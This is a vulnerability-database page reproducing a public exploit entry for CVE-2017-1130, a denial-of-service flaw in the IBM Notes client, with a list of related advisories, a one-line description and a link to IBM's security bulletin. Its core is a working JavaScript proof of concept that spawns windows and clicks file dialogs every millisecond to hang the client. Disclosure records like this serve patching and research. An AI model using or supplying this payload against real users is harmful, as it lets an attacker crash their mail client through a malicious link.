| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| IBM Notes 8.5.x/9.0.x - Denial of Service (2) Exploit | 4 Sep 201700:00 | – | zdt | |
| IBM Lotus Notes Denial Of Service Exploit | 9 Nov 201700:00 | – | zdt | |
| CVE-2017-1130 | 31 Aug 201700:00 | – | circl | |
| IBM Notes Denial of Service Vulnerability (CNVD-2017-25669) | 6 Sep 201700:00 | – | cnvd | |
| CVE-2017-1130 | 5 Sep 201721:00 | – | cve | |
| CVE-2017-1130 | 5 Sep 201721:00 | – | cvelist | |
| IBM Notes 8.5.x9.0.x - Denial of Service (2) | 31 Aug 201700:00 | – | exploitpack | |
| IBM Notes Denial Of Service | 10 Oct 201706:52 | – | metasploit | |
| CVE-2017-1130 | 5 Sep 201721:29 | – | nvd | |
| CVE-2017-1130 | 5 Sep 201721:29 | – | osv |
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
# Exploit Author: Dhiraj Mishra
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-1130
# Category: IBM Notes (Console Application)
1. Description
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
2. Proof of concept
<script>
var w;
var wins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
for (var k in wins) {
// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
if (wins[k] && wins[k].status === undefined) {
wins[k].close();
delete wins[k];
}
}
w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
if (w) {
wins[i] = w;
i++;
}
}, 1);
</script>
3. IBM Security Bulletin
http://www-01.ibm.com/support/docview.wss?uid=swg21999384Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation